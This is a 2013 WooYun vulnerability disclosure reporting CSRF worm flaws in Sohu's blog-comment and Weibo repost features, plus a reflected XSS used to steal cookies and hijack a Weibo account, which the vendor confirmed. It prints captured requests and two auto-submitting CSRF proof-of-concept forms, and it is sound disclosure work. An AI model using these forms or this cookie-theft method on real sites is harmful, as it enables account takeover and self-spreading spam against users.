当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023269

漏洞标题:搜狐微博csrf蠕虫&利用xss劫持微博帐号

相关厂商:搜狐

漏洞作者: se55i0n

提交时间:2013-05-08 12:48

修复时间:2013-06-22 12:49

公开时间:2013-06-22 12:49

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-08: 细节已通知厂商并且等待厂商处理中
2013-05-09: 厂商已经确认,细节仅向厂商公开
2013-05-19: 细节向核心白帽子及相关领域专家公开
2013-05-29: 细节向普通白帽子公开
2013-06-08: 细节向实习白帽子公开
2013-06-22: 细节向公众公开

简要描述:

搜狐的大锅,说好的礼物呢?发个洞子提醒下,话说是不是该落实下礼物咯:D

详细说明:

1)csrf蠕虫1
1.1)问题i.sohu.com评论功能上,见下图;

1.jpg


1.2)点击评论并抓包,得到数据如下;

POST /a/app/discuss/save.htm?_input_encode=UTF-8&_=ajeglyxpsf HTTP/1.1
Host: i.sohu.com
Proxy-Connection: keep-alive
Content-Length: 61
Origin: http://i.sohu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://i.sohu.com/p/=v2=aaBh5ULzWW9pVYYtpmNvbQ==/blog/view/260587564.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ...
type=0&discusstype=1&appid=blog&itemid=260587564&content=test


1.3)测试了下,这里未校验referer、无token,例子POC如下;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://i.sohu.com/a/app/discuss/save.htm?_input_encode=UTF-8" method="POST">
<input type="hidden" name="type" value="0" />
<input type="hidden" name="discusstype" value="1" />
<input type="hidden" name="appid" value="blog" />
<input type="hidden" name="itemid" value="260587564" />
<input type="hidden" name="content" value="test" />
<input type="submit" value="submit" />
</form>
<script>
document.se55i0n.submit();
</script>
</body>
</html>


1.4)这里还能GET方式提交请求,并且会泄露被评论博客用户的个人搜狐帐号信息;

3.jpg


1.5)提交成功后,会转发一条微博;

12.jpg


2)csrf蠕虫2
2.1)问题出在微博的新功能上,如下图;

9.jpg


2.2)发表一条微博,发现旁边有个“+2”的功能,点击并抓包得到数据如下;

POST /twAction/reTwitter HTTP/1.1
Host: t.sohu.com
Proxy-Connection: keep-alive
Content-Length: 68
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://t.sohu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://t.sohu.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ...
msgid=8205603065&content=&#43;2&type=&at=8205603065&msg=%26%2343%3B2


2.3)"msgid"对应了转发的微博,content为内容“+2”(这里内容能够我们能够控制),测试发现未校验referer,未加入token,so;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://t.sohu.com/twAction/reTwitter" method="POST">
<input type="hidden" name="msgid" value="8205603065" />
<input type="hidden" name="content" value="test" />
<input type="hidden" name="at" value="8205603065" />
<input type="hidden" name="msg" value="test" />
<input type="submit" value="submit" />
</form>
<script>
document.se55i0n.submit();
</script>
</body>
</html>


2.4)使用另一个帐号登录并运行该POC效果如下;

10.jpg


2.5)返回微博查看效果;

11.jpg


3)利用sohu.com下某处发射型xss劫持微博
3.1)问题所在:http://register.mail.sohu.com/servlet/getUnreadMailCountServlet?callback=...
3.2)仅仅测试了FF下的效果;

6.jpg


3.3)利用se55i0n微博帐号测试下,能够得到cookie;

8.jpg


3.4)利用获取到cookie,成功登录微博帐号;

7.jpg


PS:当然xss和csrf还能双剑合璧,效果更好,哈哈!一次发这么多,大锅,礼物呀!!!

漏洞证明:

见详细说明

修复方案:

你们懂的!

版权声明:转载请注明来源 se55i0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-05-09 12:53

厂商回复:

感谢对搜狐安全的关注

最新状态:

暂无